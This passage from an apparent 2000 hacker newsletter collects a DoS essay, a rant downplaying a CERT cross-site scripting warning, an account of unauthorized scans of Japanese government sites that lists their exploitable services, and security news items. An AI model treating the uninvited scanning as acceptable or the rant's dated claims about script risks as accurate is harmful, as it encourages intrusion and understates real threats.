Script, Will Destroy (Lessons in DoS) By: Brian Martin I began writing this article almost one year ago, after the onslaught of smurf attacks being launched against various networks throughout the Internet. At the time, the newly discovered Denial of Service (DoS) attack was a crippling tool designed for one purpose; remotely disabling machines by flooding them with more traffic than they could handle. The smurf attack was the first well known (and well abused) DoS attack that could effectively cripple any network, regardless of size or bandwidth. This presented a new problem to network administrators and security personnel worldwide. The LowDown Also known as Network Saturation Attacks or Bandwidth Consumption Attacks, the new breed of DoS attacks flood a remote network with an staggering amount of traffic. Routers and servers targeted would go into overdrive attempting to route or handle each packet as it came in. As the network receives more and more of these illegitimate packets, it quickly begins to cause legitimate traffic like web and mail to be denied. In minutes, all network activity is shut down as the attack consumes all available network resources. Prior to bandwidth consumption attacks, most DoS attacks involved sending very few malformed packets to a remote server that would cause it to crash. This occured because of bugs in the way many servers handled the malformed packets. Malformed packets (also known as Magic Packets) consisted of network protocol options that were out of sequence, improperly matched, or too large. As a result, a server receiving these packets had no rules or guidelines dictating how it should behave when processing the malformed packet. The result was a system panic or crash that would basically shut the machine down or force it to reboot. Perhaps the most well known example of this type of attack is the WinNuke attack. Regardless of ethics or motives, Magic Packet DoS attacks showed an inkling of grace in their execution. A single packet sent from one server to another, causing it to crash or reboot was a targeted attack. The precision with which this type of attack is carried out is analogous to a scalpel in surgery. Network consumption attacks on the other hand involve millions of packets. Worse, once launched the attack was no respector of those standing between the launch point and the target network. Often times thousands of customers sharing bandwidth with the target would be adversely affected as well. A single attack of this nature had the ability to knock thousands of machines off the Internet in a single swoop. Such attacks are the equivalent of using a broadsword to do surgery. The Next Generation Attacks like the smurf DoS have a cascading affect that can be seen as a virtual avalanche. The starting point is nothing more than a few pebbles and snowballs (packets). As they travel downhill (along the path of routers to the target), they accumulate more mass and trigger the release of more pebbles. By the time the falling material hits the bottom of the mountain (the target), it is swamped in large amounts of snow and rocks. Despite the effectiveness of this attack, there is a single point from which the attack is launched. If an attack is detected early enough, it is possible to filter out the offending packets before they leave the original network. The next generation of Denial of Service attacks are known as Distributed Denial of Service (DDoS) attacks. Expanding on the idea of network saturation attacks, DDoS effectively does the same thing but utilizes several launch points. The philosophy and objective of this is twofold. First, if a single machine being used to launch an attack is discovered and disabled, the overall attack proceeds with near full force. Second, by utilizing several launch points on different networks, an attacker is able to shut down larger networks that might not otherwise be affected by a single flood. Taking Down the Big Boys Prior to launching this form of DDoS flood, the attacker must first compromise various hosts on different networks. The more networks and machines used as launch points, the more potent the attack. Once each host had been broken into, they would install a DDoS client program on the machine that would sit ready to attack. Once the network of compromised servers was configured with the new client program, the attacker could send a quick command from the DDoS server software triggering each machine to launch an attack. [chart comparing 56k vs cable vs t1 vs t3] Until this last wave of DDoS attacks, it was generally assumed that hosts residing on large pipes (connections with incredible bandwidth) could not be seriously affected by network saturation attacks. As large Internet Service Providers (ISPs) are finding out, this is no longer the case. By using several smaller network connections, an attacker can eventually saturate the biggest ISPs and consume all of their bandwidth. This was demonstrated most effectively with the eBay, Amazon, Buy.com and other large scale web sites. Difficulty in Tracking Neophytes to networking always seem to question why these attacks are not tracked down, and the legs of the perpetrator not broken. It is a rare case to see ISPs interested in tracking down the individual(s) behind these attacks. Rather than take the time and effort to perform an investigation (which is lenghty), most ISPs realize that a quick filter denying ALL traffic to the site being attacked is a better solution. In essence, the ISP does the job of the person launching the attack and does it much more effeciently. As you can imagine, that is not exactly a deterrent for those committing these attacks. One of the primary reasons investigations of DoS attacks is lengthy is it involves tracking down the packets hitting the target. Rather than leave the launch point with the IP address of the machine actually being used, the packets are tagged with forged source IP addresses. Since the IP information in each packet varies wildly, and since the addresses can not be trusted, a network administrator must trace the packets back to the source one router at a time. This involves connecting to the router (often times this must be done at the physical console for security reasons), setting up a filter or sniffer to detect where the packets are coming from before arriving at that particular router, and then move to the new offending router. This presents problems when you consider a single packet may cross as many as thirty routers owned by ten different companies. The act of forging the source IP of a packet is called IP Spoofing and is the basis for a wide variety of network attacks. One of the original intentions of a Denial of Service attack was to knock a machine off the network in order for you to assume it's identity. Once you masquerade as that machine, it is possible to intercept traffic intended for it as well as gain access to other machines on the target network via trusted host relationships. Attackers today seem to have lost all focus on the reason one would committ a DoS attack. Save The Day Already! Denial of Service attacks are not new. They have existed in one form or another since computers were invented. In the past they involved consuming resources like disk drive space, memory or CPU cycles. Those not familiar with how computers operate often scream for quick solutions to the various DoS attacks that plague our networks. Unfortunately, this is easier said than done. Every weekday morning and afternoon millions of Americans go to and from work. They pile on to two and four lane freeways only to move at a crawl. Travelling ten miles in one hour is a common occurance for those fighting rush hour traffic in heavily trafficed areas of business districts in cities across the nation. Every day they carry out this ritual, screaming and cursing the thousands of other drivers clogging the roads, and day after day the problem does not fix itself. Be it packets or cars, it is very well established that enough of either will overcrowd a road or network connection. At a given point, too many of either will bring all traffic to a standstill. Why isn't the traffic problem solved? We all know the solution is bigger and better roads, more carpooling, diverse schedules, and more common sense when behind the wheel. Fat chance that will happen anytime soon. On the flip side, it is very unlikely that they will fix every router on every network and install mechanisms to help avoid network saturation attacks. In the long run, it is a rather simple fix that could help eliminate these attacks. Any network device that accepts or passes network traffic can be designed to monitor activity better. If a web server is receiving too many hits, it starts rejecting new connections so that existing connections can still view pages or interact with the site. This practice is called throttling or bandwidth limiting and is designed to prevent excessive connections, conserve resources and keep things operating correctly. Unfortunately, this philosophy has not carried over to routers (the machines that pass all internet traffic) so network consumption attacks go on unchecked. A relatively few amount of networks have learned this is a good solution to flood attacks. As such, their routers are designed to monitor traffic and quit passing illegitimate traffic once detected. The problem with this approach is that once the flood of packets have hit the remote network, the damage is done. The downside to this mechanism is the added latency as the router checks each and every packet that passes through it. Because of this slowdown, ISPs hesitate implementing this solution. In order to make connection throttling effective, every network router should have this mechanism implemented. This would allow a router close to the source of the attack to detect the illicit traffic and put up a filter that rejected it before it left the launch point. This invariably leads to the question "How do you know if traffic is illegitimate?" Looking back to the section on IP spoofing, we can easily create a quick solution to the problem. In fact, this mechanism is found in most Firewalls implemented today. In the diagram above, we show a forged packet with the IP address of 150.23.83.44. It stands to reason that such a packet would not legitimately be travelling around a network designated by the 1.2.3.x subnet. Because of this, any router on that network (especially the one acting as a gateway to the outside world) receiving that packet should drop it. Instead of blindly passing the packet on without question, routers should discriminate against suspicious packets by refusing to pass them on to the next router and setting off some kind of alarm for the administrator. A second mechanism can be put into place that would help cut down on these attacks. On any given day, there is an average amount of traffic passed through any router. By monitoring these averages and applying other common sense rules, routers could be made to throttle heavily increased traffic. For example, if a router detected a sudden surge in traffic to a destination machine in which every packet claims to originate from a different IP address, that is a good sign of a saturation attack using spoofed packets. Rather than pass that traffic down the network, the router should throttle the traffic to avoid the likely flood that will ensue. As stated many times before, easier said than done. Implementing these features falls on the many vendors of routers. Using these routers on production networks on the open Internet is up to the tens of thousands of companies maintaining a presence on the Internet. These upgrades cost time and money, something companies hesitate to invest; until the first time they are on the receiving end of such an attack. Like most security incidents, companies tend to implement reactive security measures, rarely proactive measures. Why Ask Why? Somewhere along the way, everyone wants to know why such attacks are carried out. Using the recent series of attacks against Yahoo, eBay and others is just as good example as any. To quash the distant hopes of a reasonable explanation, "There is no good reason!". Consider that your typical DDoS attack affects hundreds (if not thousands) of machines, on a wide variety of networks. The single purpose of the attack is to cripple or shut down the target site so that it can not receive legitimate traffic. There are only a handful of reasons for doing it at all, none of which are reasonable or justifiable. In other words, DoS attacks are worthless and childish. The first reason with perhaps the longest history is simple revenge. Some site out there wronged you in some way. Perhaps they spammed you, stopped hosting the free web pages they provided for you, fired your father or committed some other transgression. DoS attacks are a form of virtual revenge, especially against companies doing business over the Internet. The primary argument here is that these attacks cause problems for a number of ISPs, other customers who share bandwidth with the target, as well as the satisfied customers of the site. This goes back to the broadsword vs scalpel analogy. The second reason has become rather trendy with novice script kiddies, second rate web page defacers, and those under the illusion they are part of the professional security community. "I did it to prove the system was vulnerable!" This is perhaps the most pathetic justification for launching a DoS attack. To many, this is no different than the attacker setting off a large nuclear device right next to a corporate server and then proclaiming "See! This can impact your operations!" Of course it can, this has been proven a hundred times over. The third reason I can come up with falls back to playground rules. "If I can't play kickball, I'll throw the ball on the roof so no one else can play either!" This third grade mentality is far from justification of such attacks. Those wishing to exact some form of punishment against a site should consider the diminished intellect required to launch these attacks. There are better ways to deal with mean companies. My Rant Three types of people deserve the brunt of harsh insults and petty name calling. Each are responsible for this problem plaguing Internet users, and each could do their part to help stop it. Each individual that carries out a DoS attack does so knowing full well what it could result in if they are caught. Practically nothing. There is precious little to deter someone from carrying out such vicious attacks. The very few times administrators put effort into tracking down a malicious user it results in them getting ousted from the ISP. The next day, the offending user is back online accessing the Internet via another ISP. Until the attack against Yahoo, the Federal Bureau of Investigation (FBI) was not concerned over these attacks. To date, the FBI has not managed to apprehend the perpetrator of a devastating DoS attack against their own home page (www.fbi.gov). For one reason or another they were seen as an annoyance, not a reason for loss of business. Law Enforcement needs to take a bigger interest in DoS attacks and start to punish those responsible. These types of attacks should take any competant law enforcement agent a few hours of tracking and maybe a handful of legitimate warrants. Like the FBI, ISPs receiving these attacks need to take more proactive steps in preventing DoS attacks. When they do occur, ISPs should also take more time in tracking down the offending users and passing on the information to appropriate law enforcement. Rather than silently kicking them off the Internet for a day, taking a more active and public stance showing that malicious activity will not be tolerated would have a better effect. Those ISPs scared of retaliation need to remember that they are in the best position to stop the attackers. Last, the pathetic kids (literally and figuratively) committing these attacks. In many cases, these attacks are launched with mystical scripts written in foreign languages and just produce the desired affect. There is no grace, no skill, and no intellect behind these attacks. You are not a hacker and you do not deserve respect for your childish actions. You are no better than the twisted individuals who spray a crowd of innocent bystanders with a machine gun, only to nick your intended target. If you can't express yourself better than a saturation attack, and can't deal with being called a name or wronged somehow, seek help offline. You sorely need it. Article: Brian Martin (bmartin@attrition.org) Images: Dale Coddington (dalec@attrition.org) http://www.attrition.org Copyright 2000 Brian Martin @HWA 72.0 HNN: Cert Warning? : what me worry?? - buffer overflow article ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ CERT warning? What, me worry? By: Coris Neme The February 3 announcement by CERT of a major security hole that affected all Web browsers so badly that they recommended wiping all cookies and browsing only known sites sounded bad--until I read the warning. I'm writing this article for one reason and one reason only: to dispel the FUD and hysteria of this ludicrous "warning". I've seen e-mail virus hoaxes that I was more inclined to panic about. The supposed danger here, cross-site scripting, is that malicious JavaScript code could appear on a Web page, a newsgroup posting, or an e-mail. (Oh, my! The horror!) You might want to restrain your shock; this isn't news. Malicious scripts, unseen by the average user, have been possible since scripting languages came into being. Poison JavaScript and nasty Java applets are nothing new under the sun. CERT is basically telling us that it's 1996 again. To be fair, the warning goes into a little more detail: It says that dynamically generated pages could launch JavaScript code unintentionally. Mr. Obvious, it's time for your wake-up call. Any page, dynamic or static or anything in between, can contain malicious code. But if you've disabled the scripting language that the code uses, it's irrelevant where the code came from. Another point the CERT warning raises is that this so-called malicious code could hide in frame and snoop data from another frame entirely. Sure, if your browser's buggy enough to allow such a thing. Dozens of such vulnerabilities have been removed from both Netscape and Internet Explorer; I think the threat of one frame spying on another is just about over. But hey, if it really was '96 all over again, they'd have an excellent point. While we're on the subject, why do e-mail and news clients even support JavaScript, anyway? There's no legitimate purpose for it being there, after all, and it just serves as a way for someone to exploit the next big implementation bug that pops up. Had CERT posted a recommendation that all future browsers remove scripting capabilities from their e-mail and news clients, I think the hacking community would have stood up and applauded. Shall we eradicate our entire cookie file, only browse the sites that are in our bookmarks, and never venture forth onto the Web again because of a sudden warning about a low-grade threat that's existed for nearly half a decade and for which many of the exploits have already been patched? The layman and the newbie are certainly being led to think so. I simply can't believe their recommended course of action--disable all scripting, don't browse promiscuously, and get rid of all your cookies. (I usually wipe most of my cookies anyway, but there are a few I keep.) I was surprised to see the news posted without so much as an editorial about how outdated and overblown the warning really is. This is 2000, not 1996. Malicious code is still out there and yes, it still can get you; but about the most that it can do is overload your system and force a shutdown or a crash. (Poision JavaScript or Java that causes a crash is usually a self-solving problem. Such code can be found and eliminated; it's not stealthy.) It can't (usually) cause one frame to spy on another. It can't just arbitrarily steal data from your hard drive. It's as dangerous and as harmless in static pages as in dynamically-generated pages. I think it would be nice to read the news Monday and see that the media, instead of repeating the warning blindly, was now telling the world that the hacking community had denounced the CERT warning for the ridiculous paranoia it really is. Or failing that, perhaps we could get the blueprints to the time machine from whence this message came, and in turn we could deliver our own Chicken Little alerts about events that came and went many years ago. (Brace yourselves; I feel a 1987 coming on.) Coris Neme @HWA 73.0 HNN: The Japanese Panic Project - buffer overflow article ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ The Japanese Panic Project Findings of a simple fifteen-minute security audit. Written by YTCracker Greetings from Colorado Springs. As you have probably heard by now, the Japanese government is panic-stricken following a few simple defacements of their government's websites. Damage control is quickly being administered to the sites in the limelight, however the problems still stand. McIntyre[of Attrition] and I were discussing the recent news uproar concerning the aforementioned defacements. He and I were curious if the Japanese government was either extremely secure or extremely ignored. I mounted up on my 486[running console slack, you may phear now], fired up nmap and went at it, looking for anything that didn't look right. Anything that warranted a deeper investigation [checking the version of a daemon, running an rpcinfo query on a box] I accomplished using basic stock commands. Nothing extremely fancy or "zero-day", just the basics. A few minutes into my audit of some of the top-level government websites, I discovered two vulnerablities on the www.stat.co.jp website. Continuing on, I informed McIntyre of my findings. Lo and behold, just a few hours after this extremely shallow security audit, the www.stat.go.jp site was defaced. I systematically ran through the sites on this list [found here] and my findings were pretty astounding. Many of these government sites contain vulnerabilities[several-year-old ones such as statd and qpop, along with newer vulnerabilities such as amd and sadmind] and run comparitively outdated operating systems [SunOS4]. I noticed gross violations of security relating to proxy servers with open permissions. On one site I noticed a cgi exploit dated about two years old. More than half of the NT servers I surveyed were exploitable by either eEye's stack bug or the now-infamous remote data service [msadc.pl] exploit. These scans [COMPLETELY non-intrusive ;)] were an eye opener for me. I immediately asked myself why the Japanese government hadn't been experiencing defacements on a greater magnitude. I would assume that, for the most part, the United States rash of defacements was largely attributed to the fact that NT was a popular choice among our government. It did take a little more digging to find out what the Japanese servers were vulnerable to. I seriously believe it's going to take a lot more than the help of a few individuals to turn this up. Why is this such a big deal? I have no idea. This sort of thing happens every day at an exponential magnitude here in the United States. My guess as to why the Japanese government has been granted amnesty for so long by the defacement community is probably the fact that defacers didn't even really knew those sites existed. However, now that these defacements have blown up and are in the public eye, I feel it is a matter of time before others follow suit. The preparedness level of the ITs involved seems extremely low and it seems way too late to begin a crash course in systems administration. There is no real solution to this problem. Perhaps if preventative measures are quickly put into action [short of taking the sites offline], they have a good chance of averting some of the danger. The surprising factor is that in a fifteen minute period of goofing around, approximately three-fourths of the sites I checked had some exploitable feature. I informed who I could get a hold of. My fear is that if someone had obviously malicious intentions[i.e. the pro-Chinese, anti-Japanese hacktivist groups] and conducted a much more in-depth audit of the systems, they would find a lot more than I did. For now, damage control and politics is all that I expect to see for the next few days. YTCracker(phed@felons.org) (c)2000 YTCracker and sevenonenine If you are the administrator of a Japanese government asset and would like me to report my findings in regards to your system, please don't hesitate to mail me at the address provided. @HWA 74.0 HNN: Jan 31 Bulgarian Indicted for Cyber Crime ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by William Peter Iliev Pentchev, a native Bulgarian and former Princeton University student, was indicted by a federal grand jury in San Jose last Wednesday. He has been accused of breaking into the computer system of a Palo Alto e-commerce company and stealing aprox. 1,800 credit card numbers in December of 1998. The unidentified company claimed damages of $100,000 after being forced to shut down their systems. If convicted, Pentchev faces a maximum penalty of 17 years in prison. San Jose Mercury News http://www.mercurycenter.com/svtech/news/indepth/docs/hacker012700.htm Posted at 8:53 p.m. PST Wednesday, January 26, 2000 Student charged with hacking Fugitive: Prosecutors say he broke into Palo Alto firm, then fled to Bulgaria. BY HOWARD MINTZ Mercury News Staff Writer A federal grand jury in San Jose on Wednesday indicted a former Princeton University student suspected of hacking into the computer system of a Palo Alto e-commerce company and stealing nearly 2,000 credit card numbers. In the government's latest attempt to hunt down a computer hacker, federal prosecutors brought charges against Peter Iliev Pentchev, a 22-year-old native of Bulgaria who is believed to have fled the United States after school officials confronted him about his computer activities. According to the U.S. Attorney's office in San Jose, Pentchev left the country in late 1998, shortly after the alleged hacking incident occurred. Law enforcement officials believe Pentchev went to Bulgaria and were unclear Wednesday what diplomatic obstacles there may be to returning him to this country to face charges. The four-count indictment charges Pentchev with violating federal computer laws by hacking into an undisclosed Palo Alto company between Nov. 20 and Dec. 19, 1998, stealing at least 1,800 credit card numbers, as well as user names and passwords of that company's customers. The indictment does not specify the company, and federal officials declined to name it. But Assistant U.S. Attorney Mavis Lee, who is prosecuting the case, said the hacking incident shut down one of the company's Web servers for five days and caused enough chaos in its database that it cost the firm more than $100,000 to restore its security system. Authorities have no evidence that Pentchev used the credit card numbers to commit fraud. Federal law-enforcement officials do not believe there is a link between Pentchev and a computer intruder who earlier this month attempted to extort $100,000 from Internet music retailer CD Universe, claiming to have stolen as many as 300,000 credit card numbers. The alleged extortionist was suspected of operating somewhere in Eastern Europe. That hacker began posting more than 25,000 allegedly stolen card numbers on a web site Christmas Day. The site eventually was shut down, and thousands of customers who had shopped at CD Universe canceled their cards. In the Bay Area case, investigators said they were able to trace the computer intrusion to Pentchev because he left evidence in log files in the company's computer system. ``He wasn't careful about mopping up after himself,'' Lee said. Princeton University officials confronted Pentchev about the allegations in December 1998, and he disappeared shortly thereafter. If convicted, Pentchev faces a maximum penalty of 17 years in prison. Contact Howard Mintz at hmintz@sjmercury.com or (408) 286-0236. @HWA 75.0 HNN: Jan 31: Online Banking Still Immature ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench MSNBC has a report that illustrates just how immature online banking is. The real scary part is that even if you don't use an online bank criminals can still use your account information to steal your money. X.com, the bank used in this example, says that they have fixed all the problems. MSNBC http://www.msnbc.com/news/363440.asp Online bank allowed easy scam Automatic withdrawals in the spotlight as criminals stole with ‘help’ of legitimate finance Web sites By Bob Sullivan MSNBC Jan. 28 — One day in mid January, Imad Khalidi arrived at work at his auto dealership in Maine to discover $21,000 had been removed from his company’s bank account. It had gone to pay for merchandise ordered from Gucci in San Francisco and was automatically deducted from Auto Europe’s account. That began a hellish 10 days for the company, which was caught in the middle of an online banking nightmare involving the newest Web bank, X.com. And it was not the only case of misappropriated funds surrounding the Web site. SOMEONE HAD GOTTEN hold of Auto Europe’s bank account information and, after attempting a few fraudulent withdrawals, posted the information on the Internet. “Use this account for your x.com and Wingspan transfers,” the criminal wrote in an ominous post to a newsgroup after citing the account numbers. “Account has millions of dollars in funds, and can’t notice a mere US $25,000 a week debit. They get their statements quarterly.” For the next 10 days, Khalidi said, there were four or five automatic withdrawals attempted daily by criminals using X.com or online banking competitor Wingspan. The original Gucci charge — and some of the subsequent charges to the Portland, Maine, company’s accounts — were funneled through online bill payment assistant CyberBills.com. CyberBills acknowledged its system was used in the attempted fraud but declined to offer details, citing an ongoing investigation. Wingspan did not immediately return phone calls. In each case, the fraudulent charge was reversed by the company’s local bank — but the charges did get through the online companies, highlighting the security drawbacks that can come with convenient Internet banking. “What’s most appalling is they said it ‘was a designed feature.’ ” — ELIAS LEVY SecurityFocus.com X.com, which launched in mid-December, came under scrutiny Friday from a security group when a customer pointed out just how easy it was to trick the service into stealing money from someone else’s bank account. Users opening an X.com account were given the option to fund the account with a bank transfer, and only had to supply a bank account number and routing number — printed at the bottom of every check. This structure allowed X.com customers to easily withdraw money from victims’ accounts, and they did. One bragged on a newsgroup that he had lifted $4,500. The company, which added security measures that stopped the scam Jan. 21, said it knows of only six bad charges, totaling less than $10,000. CEO Bill Harris said there may be more victims who have not yet noticed fraudulent charges. Word of the easy money started to spread on Internet newsgroups in early January, well before X.com addressed the flaw, as thieves bragged back and forth about their successful swindling. Harris conceded the company wasn’t aware of the cyber taunting. “I wouldn’t at all be surprised if we weren’t aware of what was in those newsgroups,” he said. The ease with which criminals could withdraw money from victims’ accounts disturbed Elias Levy, who runs SecurityFocus.com, an Internet security information service. The Web site issued a release about the problem on Friday. “What’s most appalling is they said it ‘was a designed feature,’ ” Levy said. The company wanted to make online banking as simple as possible, so it allowed depositors to skip a step like sending in a voided check to verify their identity. “It was a calculated risk. Obviously they calculated wrong.” Harris said a series of new company policies make X.com safe; it now only allows transfers between accounts held under the same name, for example. He said the changes have been well received by customers and stopped short of saying his company has committed a serious security snafu. “I don’t think a mistake was made,” he said. “If we had to do it all over again, I’m not sure we would start without a canceled check procedure.” A spokesperson for Cyberbills said customers must provide physical proof they own an account before they are allowed to draw funds from it to pay bills. But Khalidi was critical of X.com — and Wingspan and CyberBills — for acting slowly in response to his company’s crisis. “It took them more than one week (to stop the criminal activity),” he said. “The only reason they knew we were getting hit was because we told them.” CyberBills disputes that, saying it kept the account open during that time at Auto Europe’s request. The company also claims to have discovered the scam itself using “internal security procedures.” He believes the scam artist posted the account information on the Internet to flood it with fraudulent charges, creating a smoke screen that would make tracking the criminal harder for investigators. Auto Europe’s Net experience should be a lesson to other businesses, he said. Even if they have no dealings at all on the Internet, they can still be a victim of an Internet scam. “As long as you are vigilant you can protect yourself,” he said. “We check our accounts every day.” Have a tip about this or other online fraud? Write to tipoff@msnbc.com @HWA 76.0 HNN: Jan 31: E-Mail Scanning System In Progress ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by maierj Lockheed Martin Energy Systems is progressing on the Ferret project, an artificial-intelligence concept that's being developed at the Y-12 nuclear weapons plant in Tennessee. It is hoped that Ferret will help prevent the inadvertent, accidental release of classified information through email by scanning it for key words. ABC News http://abcnews.go.com/sections/tech/DailyNews/Ferrets_000126.html Ferreting Out Spies Program To Detect Classified Information In E-Mail By Frank Munger Scripps Howard News Service K N O X V I L L E, Tenn., Jan. 26 — Work reportedly is progressing toward an autumn pilot project with Ferret, an artificial-intelligence concept that’s being developed at the Y-12 nuclear weapons plant to scan e-mail for classified information. “Right now we seem to be pretty much on track,” said Peter Kortman, program manager at Lockheed Martin Energy Systems, the contractor operating Y-12 for the federal government. Still in Initial Stages “We’re still in the initial stages, and the tough issues are being ferreted out (pun intended, presumably),” Kortman said. One of the issues being addressed is how Ferret (formerly called Pherret) deals with the informal lingo sometimes used in e-mail. Apparently the system does quite well with the language used in formal documents and technical reports. The initial use for Ferret would be to scan reports or messages that involve information related to nuclear weapons. It would help ensure that the information to be released freely and publicly does not contain classified matter. Interestingly, the Ferret system can only be used on classified computer systems, according to Kortman. Why? Kortman explains: “In order to detect classified information, you have to have a pretty good idea of what it is. Therefore, that means the Ferret structure and knowledge base is really classified.” Therefore, if Ferret was set up on an unclassified system, some clever person might be able to ask questions, play with information and phrase things differently until ultimately concluding — through trial and error — that certain items are classified. Determining Ferret Likes, Dislikes “You could determine from your questions what Ferret likes and what Ferret doesn’t like,” Kortman said. One of the time-consuming tasks associated with a prototype system like Ferret is feeding it information to help develop a knowledge base. That involves going rule by rule in classification guides, topic by topic, trying to incorporate as many descriptions of the same information as possible. Once that information is there, however, Ferret has the capability to interpret and identify much, much more in terms of concepts and word relationships. “We have a weapons expert working with us ... and using his experience and expertise to ask Ferret different types of questions,” Kortman said. It’s impossible, of course, to make a system foolproof because there are so many ways of saying things, and Ferret won’t break down codes and muzzle spies. It’s main task is to help prevent the inadvertent, accidental release of classified information. But this little slice of artificial intelligence is expected to do that task at least as well as some of the plant’s top classification reviewers and probably do it a lot faster. “What we’re finding is that Ferret does remarkably well,” Kortman said. “I’m very happy with it.” In a recent issue of Lockheed Martin Today, the developers of Ferret offered a simple description of how the system works: Protecting Classified Recipes Suppose you run a restaurant and want to protect the fact that the secret ingredient in your hugely popular coffee pastries is cappuccino. In making up a new menu, your assistant pens this description of the pastries: “Our chef highly recommends his deliciously moist chocolate cake imbued with the richness and warmth of strong, creamy coffee.” Makes you want one on the spot, but would Ferret like it? Let’s see. Ferret would “know” that cake is a pastry. It also would know that cappuccino is generally espresso with extra milk or cream and chocolate added. It associates “creamy” with extra cream or milk, and it is reasonably sure, in a restaurant context, that “strong” and “coffee” together implies “espresso.” Voila! Ferret concludes that your menu suggests pastry with cappuccino and, hence, that it contains “classified information.” Send that menu back to the kitchen! @HWA 77.0 HNN: Jan 31: USA Today Headlines Changed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Code Kid While this was not a web page defacement, similarities can be drawn. Boston, New York, Washington, Denver and San Francisco had some copies of the USA Today paper wrapped in a fake masthead. The fake front page read USA Decay and had headlines like "Pentagon to Throw Bombs Away," and "Defense, Education Departments to Merge." A peace activist organization known as Shiftdough.org claimed responsibility. Nando Times http://www.nandotimes.com/technology/story/body/0,1634,500160075-500200480-500894258-0,00.html Group puts fake front page on USA Today Copyright © 2000 Nando Media Copyright © 2000 APonline By BRIGITTE GREENBERG WASHINGTON (January 27, 2000 6:35 p.m. EST http://www.nandotimes.com) - Some readers who bought copies of USA Today on Thursday did double-takes after a group of peace activists wrapped some papers in a fake front page with the masthead: "USA Decay." Officials with USA Today said they did not know how many streetside newspaper boxes had been targeted or how many newspapers were affected, but the group claimed to have hit boxes in nine cities, including Boston, New York, Washington, Denver and San Francisco. The organization that claimed responsibility calls itself Shiftdough.org. In a press release, the group described its members as a "collection of activists who call for shifting dough out of the Pentagon budget and into human needs," such as education, health care and the environment. The release gave no information on how to contact the members, and on the Web site, they acknowledge trying to conceal their identities. The site is hosted by a Burlington, Vt., company and is registered to Michael Dorfman of Floro, Norway. "I set up the Web site and put together the list of the links. That was my contribution, but I was not involved at all in this newspaper action," Dorfman said Thursday when contacted by phone. "Shiftdough is kind a loose affiliation of activists. I definitely support what it stands for." But Dorfman said he did not know how many people were members of the group, how many newspaper boxes had been hit, or who was responsible for altering the newspapers. Bob Dubill, executive editor of USA Today, said the newspaper's lawyers were checking whether the group's action was a violation of any state or federal laws. He said he learned of the mock pages from readers and employees. "We're looking into the matter," said Dubill, declining to comment further. The fake front page, made to resemble the real thing, probably would not have fooled anyone for long. One headline read "Pentagon to Throw Bombs Away," and another was "Defense, Education Departments to Merge." The "Newsline section" of the real paper was renamed "Newslime." The spoof of the newspaper also offered the following travel tip "Call your travel agent to see if your destination country is currently in the process of being bombed by the USA." @HWA 78.0 HNN: Jan 31: @Stake and L0pht ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Code Kid The merger of hacker think tank L0pht Heavy industries with security consulting company @Stake Inc., is still making news. CNN has some video with a rare look inside the L0pht laboratories, they ask the question of whether L0pht has 'sold out?' (I guess we will just have to wait and see.) CNN http://www.cnn.com/2000/TECH/computing/01/27/hackers.t_t/index.html Is L0pht selling out? January 27, 2000 Web posted at: 3:34 p.m. EST (2034 GMT) (CNN) -- The L0pht Heavy Industries hacker think-tank made headlines recently, announcing it was going corporate. The group will join with some high-tech executives to form @Stake, a computer security services provider. CNN Science Correspondent Ann Kellan checks in with L0pht and wonders if the corporate image will change their lofty goals. (Go to site for videstream.) @HWA 79.0 HNN: Jan 31: Book Review: Database Nation ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Sarge Simson Garfinkel's "Database Nation: The Death of Privacy in the 21st Century." says that capitalism, the free market, advanced technology, and the unbridled exchange of electronic information is assaulting the privacy of American citizens. (Definitely an eye opener.) Nando Times http://www.nandotimes.com/technology/story/body/0,1634,500160969-500202162-500892705-0,00.html' Database Nation http://www.databasenation.com/home.htm Nando; (Site spewed raw HTML data at me, if anything is messed up blame me, k? k. - Ed) (January 30, 2000 12:14 a.m. EST - A few days ago, I picked up a new computer modem at a local retailer. As the sales clerk was preparing a receipt, she asked for my Social Security number. When I asked her why she needed that, she told me it was "policy." I politely told her that I did not want to give it to her. She seemed surprised and then dashed away to confer with a superior. When she returned, she told me my number would not be needed. The sales clerk had technically not done anything illegal - she had just asked for my Social Security number. If I had given it to her, her company, part of a national chain, would have had access to scads of information about me that has nothing to do with computer modems, but that they might have been able to sell to other businesses eager for details on my credit history and buying habits. It's just this kind of "policy" that is at the heart of Simson Garfinkel's "Database Nation: The Death of Privacy in the 21st Century." Garfinkel, who wrote about technology for the Christian Science Monitor in the early 1990s, argues convincingly that our privacy is under assault from a variety of sources, including government agencies, talented computer-geek teens next door (or in Timbuktu!), but most consistently from "capitalism, the free market, advanced technology, and the unbridled exchange of electronic information." O'Reilly Books, the publisher of "Database Nation," compares it to Rachel Carson's "Silent Spring," the book that almost single-handedly started the environmental movement in the '60s. Garfinkel is not the elegant writer that Carson is, but it's still not a bad comparison. While issues of privacy have been debated far more today than environmental concerns were in Carson's era, Garfinkel is the first to decisively and persuasively marshal all the information to show how privacy is under constant attack, often by people who claim to have our best interests at heart. It's this emphasis on the role that capitalism and the free market play in diminishing our privacy in the name of making money that will no doubt upset the most people. But as Garfinkel writes, the evidence can't be ignored. These days, advertisers, venture capitalists, and marketers demand more and more personal information about customers before they'll advertise in the media, or back a new start-up, or invest in an established company. Consequently, we're being asked for more and more personal information from corner stores, online retailers and mail-order firms. Sometimes that information is gathered without our permission, as shown by the recent Electronic Privacy Information Center report on online retailers. (Not a single firm in the top 100 online retailers had adequate privacy protection practices, and several dozen employed ads that track your movements online even after you've left their site.) What I enjoyed most about "Database Nation" was Garfinkel's ability to write about privacy issues without ranting or raving. The picture he paints is clear, sharp, and focused - a wake-up call rather than a fire alarm. And unlike many authors 